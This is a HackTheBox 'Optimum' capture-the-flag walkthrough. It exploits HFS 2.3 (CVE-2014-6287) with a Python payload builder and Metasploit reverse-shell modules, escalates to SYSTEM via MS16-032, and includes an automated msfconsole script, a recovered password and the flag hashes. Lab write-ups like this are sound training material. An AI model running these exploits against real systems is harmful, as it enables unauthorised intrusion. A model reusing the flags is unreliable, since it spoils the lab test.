# Optimum

## TARGET IP: 10.10.10.8

## HOST IP: 10.10.16.10

## Recon

### NMAP

```
nmap [Target IP]
```

<figure><img src="https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2F2WXc07rdbMBfuXLadgrU%2Fimage.png?alt=media&#x26;token=d9ed3224-6d14-4b92-bd56-427f3c121d86" alt=""><figcaption></figcaption></figure>

```
nmap [Target IP] -A -p 80
```

<figure><img src="https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2FkakTjEbLeFKiROmOxdz2%2Fimage.png?alt=media&#x26;token=bb478ad3-784d-4cc5-822d-dbbb2a0e1234" alt=""><figcaption></figcaption></figure>

### HTTP

<figure><img src="https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2FcMqtx2OjWCOPuzsdiIhA%2Fimage.png?alt=media&#x26;token=c657b033-a1fa-4818-bc99-2761c28121a6" alt=""><figcaption></figcaption></figure>

* Nothing in the page source that I could find.
* The server banner identifies it as HttpFileServer (HFS) 2.3.
  * The last release in the 2.3 series is 2.3m; the remote command execution covered below was fixed in 2.3c, so 2.3 is vulnerable.

<figure><img src="https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2FDOGiNWkO8AOkD6N3w8o1%2Fimage.png?alt=media&#x26;token=e8518bd7-705b-48c1-adea-bc56a444d465" alt=""><figcaption></figcaption></figure>

* The login button opens up prompt for login.

<figure><img src="https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2FKIMSt3KkAL8mWUsrYSc1%2Fimage.png?alt=media&#x26;token=65026d51-bd98-417e-85bd-dc9dc3bd2949" alt=""><figcaption></figcaption></figure>

* Let's take a crack at logging in with the credentials `admin:admin`.

<figure><img src="https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2FkQHg3d5d5DIzNBJKgVXA%2Fimage.png?alt=media&#x26;token=50a5f662-448f-4e58-b929-a1acab909439" alt=""><figcaption></figcaption></figure>

* Discovered a new path, `/~login`. Note the tilde in front of the name.

![](https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2FfdOABwk62jtC8brTbM2Q%2Fimage.png?alt=media\&token=936c9dd3-345e-47af-86ca-701f4e88a47f)

### Vulnerable Software

* HFS 2.3 is old and has well-known remote command execution bugs.
* Many of them are listed on the project's own website:

![](https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2FXMm3QRu9w3RZwlPlPqHN%2Fimage.png?alt=media\&token=34dc196d-e29d-4837-9e72-81356d66e1d6)

* Exploit-DB has two verified exploits for it, [1](https://www.exploit-db.com/exploits/34668) and [2](https://www.exploit-db.com/exploits/39161). Both abuse CVE-2014-6287: a `%00` (NUL byte) in the `search` parameter stops HFS's macro filter, so a `{.exec|...}` macro placed after it is not stripped but is still executed.

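The following is an added example written for this writeup, not HFS's own Delphi source and not the Exploit-DB scripts. The two checker functions are a simplified Python model of the behaviour CVE-2014-6287 describes (the filter stops scanning at a NUL byte, so a macro placed after `%00` in `search` is never seen by it but is still executed), shown next to a fixed version; the URL builder produces the request shape used by Exploit-DB 34668. The target URL and command are assumptions for the lab box.

```python
"""Illustrative model of CVE-2014-6287 (HFS 2.3 / 2.3a / 2.3b) plus a payload
builder for the request shape used by Exploit-DB 34668.

Added example for this writeup; this is neither HFS's Delphi source nor the
Exploit-DB scripts. The checker functions model the behaviour the CVE
describes (the macro filter stops at a NUL byte, so a macro after %00 in the
`search` parameter is not filtered but is still executed). The target URL and
command below are assumptions for the lab box.
"""
import re
import urllib.request
from urllib.parse import parse_qs, quote, urlsplit

# HFS macros open with "{." and close with ".}", e.g. {.exec|cmd.}
MACRO_OPENER = re.compile(r"\{\.")


def vulnerable_has_macro(search: str) -> bool:
    """Model of the pre-2.3c filter: the scan treats the string as
    NUL-terminated (PChar style), so everything after the first \\x00 is
    invisible to it."""
    visible = search.split("\x00", 1)[0]
    return MACRO_OPENER.search(visible) is not None


def fixed_has_macro(search: str) -> bool:
    """Model of a correct filter: inspect the whole string, and reject a NUL
    in a search term outright since it has no legitimate use there."""
    return "\x00" in search or MACRO_OPENER.search(search) is not None


def build_search_url(base_url: str, command: str) -> str:
    """Return http://host/?search=%00{.exec|<command>.} (EDB-34668 shape).

    The NUL is sent as %00 so it survives the query string; the command is
    percent-encoded so spaces, slashes and backslashes are preserved.
    """
    base = base_url.rstrip("/")
    return f"{base}/?search=%00{{.exec|{quote(command, safe='')}.}}"


def decoded_search_param(url: str) -> str:
    """What HFS sees after URL-decoding the `search` parameter."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query["search"][0]


def trigger(base_url: str, command: str, timeout: float = 10.0) -> int:
    """Send the request to a target you are authorised to test (the lab box).
    HFS answers with its normal search page whatever happens, so success is
    judged by the command's side effect (a file written, a callback, ...)."""
    with urllib.request.urlopen(build_search_url(base_url, command),
                                timeout=timeout) as resp:
        return resp.status


if __name__ == "__main__":
    # Assumed lab values; the command only proves execution, it is not a shell.
    url = build_search_url("http://10.10.10.8",
                           "cmd /c whoami > C:\\Users\\Public\\who.txt")
    payload = decoded_search_param(url)
    print("request:", url)
    print("2.3b filter sees a macro:", vulnerable_has_macro(payload))
    print("fixed filter sees a macro:", fixed_has_macro(payload))
```

The Metasploit module used later in this writeup sends the same kind of request; it simply wraps the `{.exec|...}` macro around a PowerShell one-liner that fetches and runs the Meterpreter payload.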
## Enumeration

### Gobuster

```
gobuster dir -u http://[Target IP] -w /usr/share/dirb/wordlists/common.txt 
```

<figure><img src="https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2FmIjBPxSPjDiObZUkzdPG%2Fimage.png?alt=media&#x26;token=77d27587-2bb1-46e5-ba9a-55a0c451bb0f" alt=""><figcaption></figcaption></figure>

* Try appending a `~`, since the `/~login` path we found uses one.

```
gobuster dir -u http://[Target IP]/~ -w /usr/share/dirb/wordlists/common.txt 
```

### WinPEASx64

* winPEAS (run on the target after the initial shell) reports a password for kostas:

![](https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2FXlr9lDCVZVTSJF6UunnM%2Fimage.png?alt=media\&token=74d77e08-c01b-4c68-85eb-4bcaa129b077)

```
kdeEjDowkS*
```

* I need to be better at looking through these to see if I could've found more information.

### Browsing

* Run the typical commands from the [hacktricks checklist](https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation) to get some information on the system. From the Meterpreter session, `sysinfo` gives the OS version and architecture (inside a Windows shell the equivalent is `systeminfo`).

```
sysinfo
```

* This tells us the system is Windows Server 2012 R2.
* It is a 64-bit system.

## Exploit

### Metasploit

* Let's see what Metasploit has for HFS:

```
msfconsole
search hfs
```

![](https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2Fd3mG9UlpXB1t6IBFaIRw%2Fimage.png?alt=media\&token=2731e1a7-c5d0-4262-b675-3969709dbd89)

* The module we want is `exploit/windows/http/rejetto_hfs_exec`; it is index 1 in this search output. Search indices change between Metasploit versions, so referencing the module by its full path is safer.

```
use 1
show options
```

![](https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2Fp3QSKNh0yJUkMplYybKQ%2Fimage.png?alt=media\&token=ffba0412-b816-449b-8c1c-abbb095e42d2)

```
set rhosts [Target IP]
set lhost [Host IP]
check 
exploit
```

![](https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2FfZcP6MCvfmhUuHHLgD4D%2Fimage.png?alt=media\&token=2b0bdd56-f44d-4b14-9c01-d12aad2876d7)

* Now we have a Meterpreter session.

```
shell
whoami
```

![](https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2FjlJVNx2QNft0AZGHoiMz%2Fimage.png?alt=media\&token=87a5a99b-d160-4ca0-a159-c84002d1f373)

```
type C:\Users\kostas\Desktop\user.txt
```

* User Flag

```
b9058357319a5b76f10e01253a382c67
```

* Next step is to use Metasploit to gain root privileges. I tried browsing the system for a while but didn't find anything useful. What I need is a local privilege escalation exploit.
* When we ran the `sysinfo` command we found the system is Windows Server 2012 R2 on a 64-bit architecture, but the `windows/meterpreter/reverse_tcp` payload we used is a 32-bit process. Local exploits that target x64 need an x64 session, so we should `migrate` to a 64-bit process first.
* In the Meterpreter session, list the running processes:

```
ps
```

![](https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2FKoVTnNkzgPfIlVDKGLCD%2Fimage.png?alt=media\&token=d747782e-1a63-4eb3-bb24-9e1acae56e50)

* We see that `explorer.exe` is running as `PID 660` (the PID differs on every boot, so read it from your own `ps` output).
* Let's `migrate` into this process.

```
migrate [PID for explorer.exe]
```

![](https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2FQOReqaNOMwhy2MXFS4ih%2Fimage.png?alt=media\&token=f5470c78-16f7-46ba-be22-5194a7f69e80)

![](https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2FXi4QNkh3p7IOlZG5B9Yy%2Fimage.png?alt=media\&token=d83d62c2-8005-4b1e-acb3-49d17e58d7c9)

* Next, let's `background` the current Meterpreter session.

```
bg
```

![](https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2FbWj9mWC5U6cPoNLSL1Pj%2Fimage.png?alt=media\&token=2b666ebe-ab08-41ba-bf33-b54684e89ad8)

* We can confirm this has been backgrounded:

```
sessions
```

![](https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2F5uftvySaLOC6y8bYyuQG%2Fimage.png?alt=media\&token=375d5969-2378-4fab-86f2-f73f157cb69f)

* Since we now have a session on the Windows host, let's look for a Metasploit local exploit that gets us to SYSTEM.

```
search exploit/windows/local
```

![](https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2FejTm0kMd2xMXJHsLnulr%2Fimage.png?alt=media\&token=c6c110a4-6a19-49ee-b362-ad17302c0b4c)

* I had to get a hint here and use a Microsoft vulnerability in the system [MS16\_032](https://learn.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-032).

* Index 33 in this search is `exploit/windows/local/ms16_032_secondary_logon_handle_privesc`; as before, the number depends on the search output, so use the full module path if yours differs.

```
use 33
```

![](https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2F1ykn27F8cqXf3D18AC6S%2Fimage.png?alt=media\&token=e601baac-a043-44e7-86f2-99a1cf47c7ba)

* I'm not sure if winPEASx64 showed this somewhere but I could have also used a tool called [Windows-Exploit-Suggester](https://github.com/AonCyberLabs/Windows-Exploit-Suggester). Here is a [write-up](https://alamot.github.io/optimum_writeup/) on how to use it. It runs on the attacking host rather than the target: save the target's `systeminfo` output to a file, update the tool's vulnerability database with `--update`, then run it with `--database` and `--systeminfo` pointing at those two files, and it lists the missing patches that have public exploits, MS16-032 among them.
* After selecting the exploit, point it at the backgrounded session (ID 1 in the `sessions` output above) and run it.

```
show options
set session 1
set lhost [Host IP]
```

![](https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2FJJfhxuvjpB8ElGy3PEMg%2Fimage.png?alt=media\&token=a1b4150a-a58c-4943-aa1f-b1589e28383b)

```
exploit
```

![](https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2Fg3IMHrozRpiFiPNzAsGE%2Fimage.png?alt=media\&token=33f54e94-86de-43b8-99b3-23730ba15369)

* We now have a shell on the system as SYSTEM (MS16-032 runs the payload as `NT AUTHORITY\SYSTEM`, which is also what owns the Administrator desktop flag).

```
shell
type C:\Users\Administrator\Desktop\root.txt
```

![](https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2F8dnHF6k8IFngct0T7Em2%2Fimage.png?alt=media\&token=86ed3bd8-502a-4de6-b827-e36d2b427c92)

```
64869e78042316656ffc989ba52d5d2b
```
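The whole Metasploit chain above (initial access, migration into a 64-bit process, MS16-032 local exploit) collected into one msfconsole resource script. This is an added example for this writeup, not part of the original or of Metasploit itself. It assumes the IPs from the top of the page, that the first session gets ID 1, that `explorer.exe` is the 64-bit process to migrate into, and that target index 1 of the MS16-032 module is `Windows x64` (confirm with `show targets` before relying on it). Comments sit on their own lines because msfconsole passes trailing text on a command line to that command as arguments.

```text
# optimum.rc  --  run with:  msfconsole -q -r optimum.rc
# Assumed values: target 10.10.10.8, attacker 10.10.16.10, first session ID 1.
setg RHOSTS 10.10.10.8
setg LHOST 10.10.16.10

# 1. Initial access through the HFS 2.3 search macro injection (CVE-2014-6287).
use exploit/windows/http/rejetto_hfs_exec
set RPORT 80
set payload windows/meterpreter/reverse_tcp
set LPORT 4444
# -z: return to the console after the session opens instead of interacting.
exploit -z

# 2. The session is a 32-bit Meterpreter on a 64-bit host; move it into
#    explorer.exe (x64, same user) so an x64 local exploit can run inside it.
#    migrate -N picks the first process with that name, so no PID is hardcoded.
sessions -i 1 -C "migrate -N explorer.exe"
sessions -i 1 -C "sysinfo"

# 3. Local privilege escalation: MS16-032 (Secondary Logon handle leak).
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set SESSION 1
# target 1 is assumed to be "Windows x64"; check with: show targets
set target 1
set payload windows/x64/meterpreter/reverse_tcp
set LPORT 4445
exploit -z

# The second session should report NT AUTHORITY\SYSTEM.
sessions -l
```

If the migration step fails (for example because `explorer.exe` is not running as the same user), the x64 session can instead be obtained by choosing an x64 payload when the local exploit is set up; the point either way is that the architecture of the session must match the architecture the local exploit targets.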

## Conclusion

* I knew going into this lab that I could use Metasploit. I didn't know when I would get to use it but knew it was an option. I wanted to try to get access to the system without Metasploit but I don't think my level of skill is high enough to do it, let alone understand it.
* I need to work on my enumeration skills with Windows systems. I have a far better understanding of them with Linux and could probably spend some more time with Windows.
* It was a good lab but I'd really like to finish one of these without help one day.
